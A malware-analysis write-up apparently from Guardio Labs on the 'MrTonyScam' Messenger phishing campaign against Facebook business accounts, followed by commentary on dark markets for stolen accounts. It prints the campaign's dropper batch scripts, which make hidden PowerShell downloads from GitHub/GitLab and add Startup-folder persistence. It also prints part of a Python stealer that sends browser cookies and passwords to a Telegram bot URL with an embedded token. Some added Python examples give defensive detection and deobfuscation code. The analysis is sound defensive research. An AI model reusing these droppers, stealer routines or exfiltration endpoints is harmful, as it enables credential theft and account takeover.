
“MrTonyScam” — Botnet of Facebook Users Launch High-Intent Messenger Phishing Attack on Business Accounts

By Oleg Zaytsev (Guardio Labs)

Facebook’s Messenger platform has been heavily abused in the past month to spread endless messages with malicious attachments from a swarm of fake and hijacked personal accounts. These threat actors are targeting millions of business accounts on Facebook’s platform — from highly-rated marketplace sellers to large corporations, with fake business inquiries, achieving a staggering “success rate” with approximately 1 out of 70 infected!

Originating yet again from a Vietnamese-based group, this campaign uses a tiny compressed file attachment that packs a powerful Python-based stealer dropped in a multi-stage process full of simple yet effective obfuscation methods.

In this write-up, we will share our analysis of this campaign, including how it appears from the victim’s perspective as well as the threat actor’s ecosystem of dark markets. All of this will illustrate how this operation, along with its robust underground marketplace supply and demand, manages to compromise so many businesses on one of the world’s most popular platforms.

Phishing Facebook Business Accounts

Receiving an instant message from someone you don’t know is usually an intriguing event, especially if this is a new business opportunity. This is exactly what this phishing method is all about — luring business owners to click on the malicious attachment, ultimately giving away their entire Facebook operation, and getting locked out for good!

Different variants of Facebook messenger phishing messages sent to businesses

Facebook Accounts with reputation, seller rating, and high number of followers can be easily monetized on dark markets. Those are used to reach a broad audience to spread advertisements as well as more scams. Additionally, individuals who own Facebook business accounts are likely to have other highly valuable accounts on other platforms such as banking, e-commerce, ad platforms, and much more — all available to grab directly from their browser’s cookies and password files. This makes them the ideal target for scammers.

A Complex Yet Familiar Attack Flow

The attack flow is a combination of techniques, free/open platform abuse as well as numerous obfuscation and hiding methods — summing to a quite complex flow. Some of those techniques we’ve come to see in other campaigns we’ve uncovered in the past like “Malverposting”, and also here all signs show the involvement of Vietnamese-originated threat actor groups:

Attack flow from Messenger phishing to exfiltrating stolen data with Telegram/Discord

As depicted above, the attack starts with messages sent in masses to business accounts via Messenger, followed by a malicious stealer payload targeting all victims’ installed browsers and ending up with stolen session cookies sent to threat actors' IM channels. A swift and effective operation.

Abusing Facebook’s Messenger

The contents of these messages vary, but they all seem to share the same context. Some messages may be complaints addressing the page for violating policies, while others may be questions related to a product that is likely advertised by the business account.

Each message is sent with a different variation of the wording and topic, a different filename, and Unicode characters substituted into various words — all to make each message unique and evade spam detection. Indeed, those messages enter the Facebook Business Suite inbox with ease:

Example of a BM inbox showing a phishing message including malicious attachment

The Payload — Small But Deadly

The payload is archived with RAR or ZIP formats, and we managed to find several variants, each containing a single file inside — a Windows batch script:

Double-clicking on the attachments will show their content in the Explorer window

This batch script acts as the Stage I Dropper, prepping your system for the real payload. It downloads yet another zip file, usually hosted on a free code hosting platform such as GitHub or GitLab — as can be seen in this sample:

@echo off
set URL=https://github[.]com/xjnhzaj12b1/iscsicpl_bypassUAC/raw/main/4duong2.zip
set ZIP_PATH=C:\Users\Public\myFile.zip
curl -L -o "%ZIP_PATH%" "%URL%"
powershell -command "Expand-Archive -LiteralPath '%ZIP_PATH%' -DestinationPath '%DESTINATION_FOLDER%'"
del "%ZIP_PATH%"

The extracted zip file contains another batch script file vn.cmd, which is directly executed, acting as the Stage II Dropper. When we examine this script, we first reveal the following mysterious view:

At first glance, it doesn’t seem like something that can be executed. The answer lies in the encoding. Text editors assume that the file is UTF-16LE encoded, while in reality, most of the characters are ASCII encoded as usual and only the first couple of characters (and the last one) are of some other encoding. This is a clever trick to hide the contents of a batch file from nosy analysts and especially automated scanners.

What makes this seemingly corrupted script work is the fact that batch scripts are executed line by line. Even though the first line is corrupted in this case, the remaining lines will still be executed. After changing the encoding, we reveal the entire script:

@echo off
set dQ=u
set UA=P
setlocal EnableDelayedExpansion
set Og=:
set Uw=S
set dw=w
set XQ=]
set XA=
start chrome https://www.alibaba.com/
C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden Invoke-WebRequest -URI https://gitlab.com/xjnhzaj12b2/home/-/raw/master/st -OutFile "C:\Users\$([Environment]::UserName)\AppData\Roaming\Microsoft\Windows\'Start Menu'\Programs\Startup\WindowsSecure.bat";
C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden Invoke-WebRequest -URI https://gitlab.com/xjnhzaj12b2/home/-/raw/master/Document.zip -OutFile C:\Users\Public\Document.zip;
C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden Expand-Archive C:\Users\Public\Document.zip -DestinationPath C:\Users\Public\Document;
C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden Invoke-WebRequest -URI https://gitlab.com/xjnhzaj12b2/home/-/raw/master/achung3 -OutFile C:\Users\Public\Document\project.py;
C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden C:\Users\Public\Document\python C:\Users\Public\Document\project.py;
start chrome https://www.alibaba.com/
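The encoding trick described above (a UTF-16 byte-order mark glued onto a file whose body is plain ASCII) is easy to check for mechanically: genuine UTF-16 text of ASCII characters has a NUL in roughly every other byte, while the bogus file has almost none. The following Python is an added example written for this write-up, not code from the original post or from the campaign; the sample bytes are constructed to mimic the trick and are not the real vn.cmd.

```python
import re

# Constructed sample: a UTF-16LE BOM (FF FE) in front of plain ASCII batch lines,
# with one stray non-ASCII byte at the end. Not the actual vn.cmd bytes.
SAMPLE = (b"\xff\xfe@echo off\r\nset XQ=]\r\n"
          b"start chrome https://example.invalid/\r\n\xff")

BOMS = {b"\xff\xfe": "utf-16-le", b"\xfe\xff": "utf-16-be"}


def bom_claims(raw: bytes):
    """Return the encoding the leading BOM claims, or None if there is no BOM."""
    for bom, name in BOMS.items():
        if raw.startswith(bom):
            return name
    return None


def looks_like_utf16(raw: bytes, threshold: float = 0.2) -> bool:
    """Real UTF-16 ASCII text is about half NUL bytes; the fake file is not."""
    if not raw:
        return False
    return raw.count(0) / len(raw) >= threshold


def editor_view(raw: bytes) -> str:
    """What an editor that trusts the BOM shows: mojibake for the fake file."""
    return raw.decode("utf-16", errors="replace")


def recover_batch_text(raw: bytes) -> str:
    """Return the readable script, honouring the BOM only when the bytes agree with it."""
    if bom_claims(raw) and looks_like_utf16(raw):
        return raw.decode("utf-16")  # the utf-16 codec consumes the BOM itself
    text = raw.decode("latin-1")
    # Keep printable ASCII plus TAB/CR/LF; the bogus prefix and suffix bytes fall away.
    return re.sub(r"[^\x09\x0a\x0d\x20-\x7e]", "", text)


def analyze(raw: bytes) -> dict:
    """Summarise the file: claimed encoding, whether it is plausible, recovered text."""
    claimed = bom_claims(raw)
    plausible = looks_like_utf16(raw)
    return {
        "bom": claimed,
        "really_utf16": plausible,
        "suspicious": claimed is not None and not plausible,  # BOM lies about the body
        "script": recover_batch_text(raw),
    }


if __name__ == "__main__":
    report = analyze(SAMPLE)
    print("BOM claims:", report["bom"], "| plausible:", report["really_utf16"])
    print("suspicious:", report["suspicious"])
    print(report["script"])
```

The `suspicious` flag (a UTF-16 BOM on a body with almost no NUL bytes) is the property a scanner can key on; the recovered text is what an analyst then reads.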

It starts with a pile of harmless and redundant set commands, just to pad it with benign code. Following that, the actual malicious part starts. The batch script launches Chrome pointing it to the Alibaba website. Why? Well, why not? Great prices. Yet, this is just a distraction of course. Then, it pulls some additional resources from the same Github repository as before and performs the following tasks:

  1. Creates a standalone Python environment by unpacking Document.zip
  2. Pulls the main stealer functionality — project.py
  3. Executes the main stealer using the Python env.
  4. Adds persistence in the form of the WindowsSecure.bat file that executes the stealer on every startup.

5 Shades Of Obfuscation

The malicious payload in the form of the project.py script uses 5 layers of obfuscation to hide its content and generate it on the fly to avoid static detection:

.unhexlify(b"789c01e61419eb425a68393141592653...[VERY LONG STRING]...9e5")))))))

The code is hex-encoded as an ASCII string and compressed in nested layers with zlib, bz2 and gzip, and lastly with lzma. Only after reversing this flow do we reveal the actual malicious payload (some functions and code are omitted in this example):

fud = base64.b64decode("LTk2MjEyNDk0OA==").decode('utf-8')
crypt = base64.b64decode("aHR0cHM6Ly9hcGkudGVsZWdyYW0ub3JnL2JvdDYzNzkwNDY3ODc6QUFGNmZfdTE4dXN1b01rcllqUUZtZWoyblNfODA1WE5NdE0vc2VuZERvY3VtZW50").decode('utf-8')

def check_chrome_running():
def find_profile(path_userdata):
def get_chrome(data_path,chrome_path):
def get_edge(data_path,edge_path):
def get_brave(data_path,brave_path):
def get_opera(data_path,opera_path):
def get_coccoc(data_path,coccoc_path):
def get_chromium(data_path,chromium_path):
def find_profile_firefox(firefox_path):
def get_firefox(data_path,firefox_path):
def encrypt(data_profile):
def getKey(afk):
def encrypt_firefox(path_f):
def delete_firefox(data_firefox_profile):
def delete_file(data_profile):
def delete_firefox(data_firefox_profile):
def decryptMoz3DES( globalSalt, entrySalt, encryptedData ):
def decodeLoginData(data):
def getLoginData(afkk):
def decryptPBE(decodedItem, globalSalt): # PBE for Password Based Encryption
def delete_file(data_profile):
def Compressed(z_ph,number):
def demso() :
def id() :

def main():
    number = "Thu Spam lần thứ " + str(demso())
    data_path = os.path.join(os.environ["TEMP"], name_f);os.mkdir(data_path)
    chrome = os.path.join(os.environ["USERPROFILE"], "AppData", "Local", "Google", "Chrome", "User Data")
    firefox = os.path.join(os.environ["USERPROFILE"], "AppData", "Roaming","Mozilla", "Firefox", "Profiles")
    Edge = os.path.join(os.environ["USERPROFILE"], "AppData", "Local", "Microsoft", "Edge", "User Data")
    Opera = os.path.join(os.environ["USERPROFILE"], "AppData", "Roaming", "Opera Software", "Opera Stable")
    Brave = os.path.join(os.environ["USERPROFILE"], "AppData", "Local","BraveSoftware", "Brave-Browser", "User Data")
    coccoc = os.path.join(os.environ["USERPROFILE"], "AppData", "Local","CocCoc", "Browser", "User Data")
    chromium = os.path.join(os.environ["USERPROFILE"], "AppData", "Local","Chromium", "User Data")
    python310_path = r'C:\Users\Public\Document.zip'
    z_ph = os.path.join(os.environ["TEMP"], name_f +'.zip');shutil.make_archive(z_ph[:-4], 'zip', data_path)
    token = 'https://api[.]telegram[.]org/bot6186662136:AAGyzxWQ0OzgVZdDQyd0pDEHRJZU_GpMEiA/sendDocument';IDchat = '-921942879'
    with open(z_ph, 'rb') as f:
        x01.post(token,data={'caption':"ID:"+id()+"\nIP:"+ip+"\n"+number,'chat_id':IDchat},files={'document': f})
    shutil.rmtree(os.environ["TEMP"], name_f +'.zip');shutil.rmtree(os.environ["TEMP"], name_f)
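Peeling the obfuscation layers described above does not require knowing the order in advance: each layer announces itself with a magic prefix (zlib header bytes, `BZh` for bz2, `1f 8b` for gzip, `fd 37 7a 58 5a 00` for xz/lzma, and an all-hex string for the outer encoding). The following Python is an added example for this write-up, not code from the original post or from the campaign; it builds a harmless one-liner wrapped in the same kind of layers, then unwraps it by magic detection, stopping at a fixed layer limit so a hostile blob cannot keep it looping.

```python
import binascii
import bz2
import gzip
import lzma
import re
import zlib

# Constructed sample: a harmless one-liner wrapped hex-over-zlib-over-bz2-over-gzip-over-xz,
# mimicking the nesting in project.py. This is NOT the real obfuscated blob.
INNER = b"print('constructed sample payload, not the real stealer')"
SAMPLE_HEX = binascii.hexlify(
    zlib.compress(bz2.compress(gzip.compress(lzma.compress(INNER))))
)

MAX_LAYERS = 16  # hard stop: a blob that never bottoms out is itself suspicious


def detect_layer(data: bytes):
    """Identify the outermost layer from its magic bytes, or None if unknown."""
    if data[:3] == b"BZh":
        return "bz2"
    if data[:2] == b"\x1f\x8b":
        return "gzip"
    if data[:6] == b"\xfd7zXZ\x00":
        return "xz"
    # zlib: CMF byte 0x78 and (CMF*256 + FLG) divisible by 31 (RFC 1950 header check)
    if len(data) >= 2 and data[0] == 0x78 and (data[0] * 256 + data[1]) % 31 == 0:
        return "zlib"
    if len(data) % 2 == 0 and re.fullmatch(rb"[0-9a-fA-F]+", data):
        return "hex"
    return None


DECODERS = {
    "bz2": bz2.decompress,
    "gzip": gzip.decompress,
    "xz": lzma.decompress,
    "zlib": zlib.decompress,
    "hex": binascii.unhexlify,
}


def unwrap(blob: bytes):
    """Peel layers until no known magic remains; returns (layer names, payload)."""
    layers = []
    data = blob
    while len(layers) < MAX_LAYERS:
        kind = detect_layer(data)
        if kind is None:
            break
        data = DECODERS[kind](data)
        layers.append(kind)
    return layers, data


if __name__ == "__main__":
    found, payload = unwrap(SAMPLE_HEX)
    print("layers peeled:", " -> ".join(found))
    print("payload:", payload.decode())
```

In practice the recovered payload is handed to a further pass (it is usually another `exec(...)` wrapper rather than final code), and the list of peeled layers doubles as a cheap signature: a string that decodes through four compressors in a row is rarely legitimate.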

A simple, straightforward Python script that extracts all cookies and login data (saved usernames and passwords) from several popular browsers it looks for on the victim’s computer. All of this is sent to a Telegram channel using the Telegram or Discord bot API, which is a common practice among scammers. In other words — this is a classic stealer.

One last bonus in this case is that the script actually deletes all cookies after stealing them. This locks the victim out of her/his accounts, giving the scammers time to hijack their session and replace the password — so the victims won’t be able to revoke the stolen session or change the password themselves.
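Two things in this chain are cheap to detect on the defender's side: the Stage I/II dropper steps described earlier (hidden PowerShell downloads, a file written into the Startup folder, a Python interpreter run out of C:\Users\Public) and the exfiltration just described (a POST to the Telegram bot API's sendDocument method). The following Python is an added example for this write-up, not code from the original post or from Guardio; the process command lines and proxy log lines are constructed in the style of the samples above, and every host, user name and bot token in them is a placeholder rather than a real indicator.

```python
import re

# Constructed process-creation command lines: three in the style of the droppers
# described above, two benign. Hosts and paths are placeholders, not real IoCs.
SAMPLE_CMDLINES = [
    r'curl -L -o "C:\Users\Public\myFile.zip" "https://example.invalid/raw/main/payload.zip"',
    r'powershell -windowstyle hidden Invoke-WebRequest -URI https://example.invalid/raw/master/st '
    r'-OutFile "C:\Users\victim\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WindowsSecure.bat"',
    r'powershell -windowstyle hidden C:\Users\Public\Document\python C:\Users\Public\Document\project.py',
    r'powershell -Command "Get-ChildItem C:\Projects"',
    r'C:\Python311\python.exe C:\Projects\build.py',
]

# Constructed proxy log lines; the bot id and token are placeholders.
SAMPLE_PROXY_LOG = [
    "2023-09-01T10:00:01Z 10.0.0.5 POST https://api.telegram.org/bot0000000000:PLACEHOLDER-SECRET/sendDocument 200",
    "2023-09-01T10:00:02Z 10.0.0.5 GET https://www.alibaba.com/ 200",
    "2023-09-01T10:00:03Z 10.0.0.7 GET https://gitlab.com/example-user/home/-/raw/master/st 200",
]

PROCESS_RULES = {
    # PowerShell told to stay invisible while fetching something from the web
    "hidden_powershell_download": re.compile(
        r"powershell.*-windowstyle\s+hidden.*Invoke-WebRequest", re.I),
    # anything downloaded straight into the per-user Startup folder (persistence)
    "write_to_startup_folder": re.compile(
        r"-OutFile\s+\"?[^\"]*\\Start Menu\\Programs\\Startup\\", re.I),
    # curl / Invoke-WebRequest writing into the world-writable Public profile
    "download_to_public_dir": re.compile(
        r"(curl|Invoke-WebRequest).*(-o|-OutFile)\s+\"?C:\\Users\\Public\\", re.I),
    # a Python interpreter that lives under C:\Users\Public running a script
    "python_from_public_dir": re.compile(
        r"C:\\Users\\Public\\\S*python(\.exe)?\s+\S+\.py", re.I),
}

# Telegram bot API upload: the URL embeds the bot id and its secret token
TELEGRAM_BOT_API = re.compile(
    r"https://api\.telegram\.org/bot(\d+):([A-Za-z0-9_-]+)/(sendDocument|sendMessage)")
# raw-file fetch from a code-hosting site: low confidence alone, useful in context
RAW_CODE_HOSTING = re.compile(r"https://(?:github|gitlab)\.com/\S+/raw/\S+", re.I)


def match_process(cmdline: str) -> list:
    """Names of every process rule that fires on one command line."""
    return [name for name, rx in PROCESS_RULES.items() if rx.search(cmdline)]


def scan_processes(cmdlines) -> list:
    """(index, matched rule names) for each command line that trips a rule."""
    return [(i, match_process(c)) for i, c in enumerate(cmdlines) if match_process(c)]


def scan_proxy(log_lines) -> list:
    """Flag Telegram bot uploads (token redacted to a prefix) and raw code-hosting fetches."""
    hits = []
    for i, line in enumerate(log_lines):
        m = TELEGRAM_BOT_API.search(line)
        if m:
            hits.append({"line": i, "rule": "telegram_bot_upload", "bot_id": m.group(1),
                         "token_prefix": m.group(2)[:4], "method": m.group(3)})
        if RAW_CODE_HOSTING.search(line):
            hits.append({"line": i, "rule": "raw_code_hosting_download"})
    return hits


if __name__ == "__main__":
    for idx, names in scan_processes(SAMPLE_CMDLINES):
        print(f"process line {idx}: {', '.join(names)}")
    for hit in scan_proxy(SAMPLE_PROXY_LOG):
        print("proxy:", hit)
```

The bot id captured from the URL is what you would report to Telegram and add to a block list; the token itself is kept to a four-character prefix so the detection output does not become a second copy of the attacker's secret. The raw code-hosting rule fires on plenty of legitimate traffic on its own and is meant to be correlated with the process rules, not alerted on by itself.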

Vietnamese Threat Actor’s Fingerprints

This Python stealer reveals the Vietnamese origin of these threat actors. The message “Thu Spam lần thứ”, which is sent to the Telegram bot appended with an execution counter, translates from Vietnamese as “Collect Spam for the X time”. The second indication is the inclusion of the “Coc Coc” browser — a popular browser among Vietnamese users.

These attackers left us the Telegram/Discord API tokens of their bots, so we could learn a little bit about them. In the above variant, the bot’s username is “AChung8668_BOT”. The stealer was sending messages to a channel named “ACHUNG — 21/8 — ❤️❤️❤️”. The administrator of this channel, who is probably one of those behind this attack, calls himself “MrTonyName”. Later, we found a couple of other Telegram bots which all led to the same username.

One of the Telegram bots used to exfiltrate stolen data

The Dark Markets are Thriving

A quick glimpse into the Dark Markets on Telegram reveals how these threat actors monetize their efforts — and how thriving and brutal this “Market” is. We see numerous channels and users offering everything from specific high-value accounts to “logs” of hundreds and thousands of hijacked business accounts (BM — Business Manager), advertisement accounts with reputation, or even linked payment methods and credits (Agency Accounts):

Telegram messages advertising stolen Facebook advertisement accounts for sale
More Telegram messages advertising stolen Facebook verified business accounts for sale

You can buy those directly from Telegram, or go to dedicated marketplaces like the following example — freely accessible, with no need for Tor/Onion-based browsers. See prices, get samples, and 24/7 support:

A marketplace for stolen Facebook business accounts

Here you even get specific tutorials on how to quickly log in to the stolen accounts and change the password without alarming Facebook’s protection checkpoints. The sites are in Vietnamese, offering a poor (possibly automated) translation to English as can be seen here:

Tutorial for how to use stolen session cookies to hijack accounts

Alarming Stats and Conclusions

Although this phishing campaign doesn’t use the most efficient of techniques and requires victims to actually download a file, unzip, and execute it, our analysis reveals the estimated stats of infections to be quite alarming!

In the following funnel diagram, we see the estimated “Conversion Rate” of this campaign in the past 30 days. If we consider the entire spectrum of Facebook business accounts, we see that at least 7% of those received phishing messages. We see that around 0.4% have actually downloaded the attachment → 1 out of 250 victims is infected!

Funnel diagram approximating 1 of 250 accounts infected worldwide

Note that the attachment did not trigger any endpoint or anti-virus protection, and even on VT only some of the samples reach as many as 2 detections at the time of writing these lines. With this, and the realization that victims downloaded the file with intent, we can only assume the final number of compromised accounts to be high and alarming!

The threat actors hold an army of bots and fake Facebook accounts as well as a listing of millions of business accounts, pages, and managers — sending over 100k phishing messages a week to Facebook users around the world:

Campaign distribution worldwide in the past 30 days

This is yet another vibrant example of what we here at Guardio refer to as The Security Gap. Threat actors will always find new ways to get to us, hijack social accounts, and abuse legitimate services for their malicious deeds. We see here the security loopholes in our modern browsers that hold easily decrypted passwords and still hold easily accessible cookies and security tokens. We see how social services like Facebook and others still fail to detect account hijacking in real time (not that it’s easy, and yet…) and also how the ecosystem of this dark market is thriving and attracts more and more threat actors to get a piece of the pie.

It’s important to be as vigilant as possible, and be ready to use more layers of security detection — you can never know where the next punch will come from.


Malicious Code Hosting Git Repos:

Filename Samples:

File Hashes Samples:

Source: Original Post